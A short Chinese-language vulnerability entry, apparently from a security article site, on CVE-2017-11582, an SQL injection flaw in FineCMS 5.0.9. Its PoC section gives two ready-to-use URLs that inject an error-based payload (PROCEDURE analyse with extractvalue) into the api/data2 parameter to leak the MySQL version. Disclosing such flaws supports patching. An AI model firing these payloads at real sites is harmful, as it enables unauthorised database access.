CVE-2017-11582
漏洞描述:FineCMS是一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。 FineCms 5.0.9版本中存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意的SQL命令。
影响版本: FineCms 5.0.9
参考资料:https://www.likecs.com/show-306845431.html
POC:
- limit注入必须在5.0.0<mysql<5.6.6情况下才成立。
http://finecms.com/index.php?
c=api&m=data2&auth=202cb962ac59075b964b07152d234b70¶m=action=related%2
0catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),con
cat(0x3a,version())),1)
http://finecms.com/index.php?
c=api&m=data2&auth=202cb962ac59075b964b07152d234b70¶m=action=tags%2
0catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),con
cat(0x3a,version())),1)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容